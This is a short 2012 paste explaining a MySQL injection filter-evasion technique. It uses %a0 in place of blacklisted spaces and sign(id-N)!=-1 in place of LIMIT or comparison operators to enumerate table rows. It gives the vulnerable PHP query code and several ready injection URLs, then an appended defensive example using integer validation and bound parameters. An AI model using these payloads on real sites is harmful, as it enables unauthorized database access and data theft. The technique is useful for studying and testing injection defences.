Untitled

a guest Jul 11th, 2012 369 Never
/* ***************************************************************************************
* MySQL Injection - getting records from a Db without using "<", ">" or "limit"          *
* @Author : Twitter.com/PaulDS_FR                                                        *
**************************************************************************************** */

So yesterday I was working on a SQL injection that was complicated to exploit... Basically the code was (I guess) something like this:

$blacklist = array('"', "'", ' ', ','); // simplified, had a lot more in there!
// Blacklisted characters are stripped, then the rest is HTML-encoded ("<" and ">" become entities)
$id = htmlentities(str_replace($blacklist, '', $_GET['id']));
// The filtered value is still concatenated into the query as SQL, not bound as data
$res = $dbh->query('select * from table where id= ' . $id)->fetch(PDO::FETCH_OBJ);
echo $res->id . $res->text;

So the first record is easy to get (classic SQL injection, which I'll not cover), but how do you go on and get the next row(s), knowing you cannot play with limit (requires a comma) nor with the "less than" (<) or "more than" (>) operators, as they are converted into HTML entities (who does that, by the way!)?

Well, I figured this trick out:

?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-1)!=-1
?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-2)!=-1
...

Without the %a0 used to insert an nbsp (to evade the blacklisting of spaces):

?id=-1 union select column1,column2 from table where sign(id-prev_id)!=-1

The important part is: where sign(id-prev_id)!=-1

It also worked (as was my case) to get other records from the same table without knowing their ids. I had 3 rows printed (ids 1, 2, 3) out of a count of 4 rows in the table... Where are you, little id?

?id=sign(id-4)!=-1
?id=sign(id)=-1

The id I was searching for was 1337 (of course :))

Ref:
http://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html#function_sign

Paul da Silva - 07/11/2012 - Pardon my English, I'm French ;)
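
Defensive counterpart to the snippet above, as an added example that is not part of the original paste: the blacklist filter returns sign(id-4)!=-1 unchanged because it contains none of the filtered characters, while an integer check plus a bound parameter keeps it out of the SQL text. The records table, its rows, the in-memory SQLite database and the function names are assumptions made for this demo.

```php
<?php
declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database (assumption: the
// original application used MySQL; "records" stands in for its table).
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE records (id INTEGER PRIMARY KEY, text TEXT)');
$dbh->exec("INSERT INTO records VALUES (1,'a'),(2,'b'),(3,'c'),(1337,'hidden')");

// The filter from the paste, reproduced only to show what it lets through.
function blacklistFilter(string $raw): string
{
    $blacklist = array('"', "'", ' ', ',');
    return htmlentities(str_replace($blacklist, '', $raw));
}

// Hardened lookup (hypothetical helper): accept only an integer, then bind it
// as a typed parameter so user input never becomes part of the SQL text.
function fetchRecord(PDO $dbh, string $raw): ?array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null; // not an integer: the value never reaches the database
    }
    $stmt = $dbh->prepare('SELECT id, text FROM records WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Inputs: one legitimate id and the two id expressions quoted in the paste.
foreach (['2', 'sign(id-4)!=-1', 'sign(id)=-1'] as $input) {
    printf(
        "%-16s filter output: %-16s hardened lookup: %s\n",
        $input,
        blacklistFilter($input),
        json_encode(fetchRecord($dbh, $input))
    );
}
```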